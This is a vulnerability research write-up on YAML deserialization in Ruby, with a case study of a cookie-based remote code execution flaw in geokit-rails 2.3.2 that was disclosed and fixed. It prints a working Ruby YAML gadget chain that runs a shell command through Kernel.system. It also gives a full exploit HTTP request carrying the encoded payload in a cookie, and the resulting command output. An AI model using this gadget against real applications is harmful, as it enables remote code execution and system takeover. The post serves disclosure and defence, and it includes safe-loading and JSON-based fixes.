Finding YAML Injection with Snyk Code

Written by:
Calum Hutton
February 23, 2023

I conducted some research to identify YAML Injection issues in open-source projects using Snyk Code. Though the vulnerability itself is not new, the potential impact of YAML Injection is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP, and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails.


YAML is more than a mere data interchange format such as JSON. The specification describes a number of advanced features that make it ripe for security investigation, such as:

  • Custom tags (e.g. as used by PyYAML)

  • Anchors and aliases

  • Merged attributes

  • Multiple-document streams

YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).

YAML deserialization in Ruby

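In Ruby, YAML parsing ships with the standard library (the Psych parser, exposed as YAML), so no additional gems are needed. An application that uses this built-in parser is vulnerable to deserialization attacks if it passes untrusted input to YAML.load() or YAML.load_file() instead of YAML.safe_load() or YAML.safe_load_file(), respectively. This applies to Psych versions before 4.0; from Psych 4.0 (bundled with Ruby 3.1 and later), YAML.load() is safe by default and the old behavior is available as YAML.unsafe_load(). An alternative, safe-by-default YAML parser is available in the SafeYAML project.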

The following script and output demonstrate an unsafe way to load YAML with YAML.load().

require 'yaml'

# A plain Ruby hash with symbol keys.
var = {
  id: 1,
  desc: 'A simple hash'
}

# The same hash, serialized as a YAML string.
yaml = '---
:id: 1
:desc: A simple hash'

puts var
puts YAML.load(yaml)

# Prints:
#
# {:id=>1, :desc=>"A simple hash"}
# {:id=>1, :desc=>"A simple hash"}

The var variable holds a simple Ruby hash, and the yaml variable contains the equivalent hash serialized in YAML form. Both puts statements display the same hash, because the yaml variable has been deserialized from a YAML string back into a hash via YAML.load(). More complex objects can also be serialized and deserialized in this way.
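For contrast, here is a minimal sketch of loading the same document with YAML.safe_load(). The helper name load_untrusted is hypothetical, and the choice to permit Symbol is an assumption made only so that keys such as :id still load. A document carrying a Ruby object tag should be refused with Psych::DisallowedClass rather than instantiated.

```ruby
require 'yaml'

# Hypothetical helper: parse untrusted YAML, allowing only plain data
# types plus Symbol (needed here for keys such as ":id").
def load_untrusted(yaml)
  YAML.safe_load(yaml, permitted_classes: [Symbol])
rescue Psych::DisallowedClass => e
  # Raised when the document names a class outside the permitted list.
  warn "rejected YAML: #{e.message}"
  nil
end

simple = "---\n:id: 1\n:desc: A simple hash\n"
tagged = "--- !ruby/object:Gem::Requirement\nrequirements: []\n"

p load_untrusted(simple)  # the same hash that YAML.load returned
p load_untrusted(tagged)  # nil, the object tag is refused
```

Keeping the permitted list as short as possible is the point of the design: every class added to it is a class an attacker can ask the parser to build.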

During the initial stages of this research, I came across a universal Ruby YAML deserialization gadget, effective on Ruby versions 2.x to 3.x, which triggers arbitrary command execution when deserialized.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

The above YAML payload will execute the id command upon deserialization if it is parsed via YAML.load() or YAML.load_file().
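The payload depends entirely on Ruby-specific tags such as !ruby/object and !ruby/module. As a rough illustration, the sketch below lists such tags in a YAML string by walking the parsed node tree, which inspects the document without instantiating any of the named classes. The helper name ruby_tags is hypothetical, and this is an aid for triage, not a substitute for YAML.safe_load().

```ruby
require 'yaml'

# Hypothetical helper: collect Ruby-specific tags from a YAML string.
# Psych.parse_stream only builds a tree of nodes; it does not create
# the objects that the tags refer to.
def ruby_tags(yaml)
  Psych.parse_stream(yaml).each
       .map { |node| node.tag if node.respond_to?(:tag) }
       .compact
       .select { |tag| tag.start_with?('!ruby/') }
       .uniq
end

suspicious = "---\n- !ruby/object:Gem::Installer\n    i: x\n- plain\n"
harmless   = "---\nid: 1\ndesc: A simple hash\n"

p ruby_tags(suspicious)  # one tag found
p ruby_tags(harmless)    # empty list
```

Malformed input raises Psych::SyntaxError, which a caller would need to handle.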

Case study: geokit-rails (2.3.2)

The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin calls the unsafe YAML.load() method from retrieve_location_from_cookie_or_service() in geokit-rails/ip_geocode_lookup.rb:

# Uses the stored location value from the cookie if it exists.  If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
  return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
  location = Geocoders::MultiGeocoder.geocode(get_ip_address)
  return location.success ? location : nil
end

The data flowing into the unsafe YAML.load() method originates from the Ruby on Rails cookies parameter, which holds the cookies sent in the request. This is good news for an attacker as the cookies can be directly controlled by crafting the appropriate HTTP request. 

Proof of concept

I set up a Rails application running the geokit-rails plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location cookie.

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0
Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt
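To see how the encoded cookie maps back to the payload, the sketch below decodes the first part of the geo_location value. It assumes the server applies form-style URL decoding to cookie values (a plus sign becomes a space and %XX becomes the matching byte); the helper name decode_cookie_value is hypothetical.

```ruby
require 'uri'

# Hypothetical helper: form-style URL decoding of a cookie value.
def decode_cookie_value(encoded)
  URI.decode_www_form_component(encoded)
end

# First part of the geo_location cookie value from the request.
encoded = '---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x'

puts decode_cookie_value(encoded)
# Prints:
#
# ---
# - !ruby/object:Gem::Installer
#     i: x
```

The decoded text matches the opening lines of the gadget, including the leading document marker and the four-space indentation.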

Within the Rails application, the payload was deserialized and executed, running the id command to prove command execution.

Started GET "/vulns" for at 2022-11-07 12:05:57 +0000
Processing by VulnsController#index as HTML
sh: reading: command not found
uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(,33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(,398(,399(,400(
Completed 500 Internal Server Error in 167ms (Allocations: 35610)

For a system using geokit-rails, an attacker exploiting this vulnerability could achieve RCE, potentially allowing for total system takeover.


This issue was responsibly disclosed to the maintainer of geokit-rails and was fixed in version 2.5.0 by storing the coordinate information as JSON instead of YAML. As a result of this research, Snyk Code's rules for detecting YAML injection were improved, so more of these issues should now be detectable in user projects.
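The idea behind that kind of fix can be sketched as follows. This is not the geokit-rails patch itself: the helper name location_from_cookie and the lat and lng field names are assumptions for illustration. JSON parsing yields only plain data types, so a YAML gadget placed in the cookie fails to parse instead of being instantiated.

```ruby
require 'json'

# Hypothetical helper: read coordinates from a cookie value stored as JSON.
# The "lat" and "lng" keys are assumed names, not taken from geokit-rails.
def location_from_cookie(raw)
  return nil if raw.nil? || raw.empty?

  data = JSON.parse(raw)
  return nil unless data.is_a?(Hash)

  lat = data['lat']
  lng = data['lng']
  # Accept only numeric coordinates; anything else is treated as absent.
  return nil unless lat.is_a?(Numeric) && lng.is_a?(Numeric)

  { lat: lat, lng: lng }
rescue JSON::ParserError
  # Non-JSON input, including a YAML payload, ends up here.
  nil
end

p location_from_cookie('{"lat": 51.5, "lng": -0.12}')
p location_from_cookie("---\n- !ruby/object:Gem::Installer\n    i: x\n")  # nil
```

Validating the shape of the parsed data as well as its format keeps unexpected values from reaching the rest of the application.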
